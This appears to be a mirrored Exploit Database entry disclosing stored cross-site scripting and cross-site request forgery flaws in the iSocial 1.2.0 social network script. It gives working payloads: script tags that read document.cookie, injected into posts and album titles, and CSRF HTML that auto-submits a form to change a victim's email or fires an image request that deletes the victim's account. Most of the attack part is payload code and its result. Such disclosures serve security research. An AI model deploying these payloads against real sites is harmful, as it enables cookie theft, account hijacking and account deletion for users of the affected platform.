iSocial 1.2.0 – Cross-Site Scripting / Cross-Site Request Forgery

• Exploit Database
• 119 阅读

• 作者： L0RD
  日期： 2018-05-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44692/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  # Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery # Date: 2018-05-22 # Exploit Author: Borna nematzadeh (L0RD) # Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2 # Version: 1.2.0 # Tested on: Kali linux   # POC 1 : Cross-Site scripting:   1) Create your account and navigate to "write post". 2) Put this payload and click on "post" : <script>alert(document.cookie)</script> 3) You will have an alert box in your page .   # POC 2 : Cross-Site Scripting:   1) Navigate to "Albums" and click on "create album" 2) In title field , put this payload : "/><script>alert(document.cookie)</script> 3) In both cases , the payload will be executed after someone opens your album or your profile.   # POC 3 : Cross-Site Request Forgery: # iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability . # Attacker can easily change user&apos;s email or delete user&apos;s account .   # Change email Exploit :   <html> <head> <title>CSRF POC</title> </head> <body> <form action="http://Target/isocial/demo/services/actionssetting/email" method="POST"> <input type="hidden" name="em" value="lord2&#64;gmail&#46;com" /> </form> <script> document.forms[0].submit(); </script> </body> </html>   # Result : # html"The information has been updated" # status"OK" # message""   # Delete account Exploit:   <img src="https://www.exploit-db.com/exploits/44692/ http://Target/isocial/demo/services/actionssetting/delete">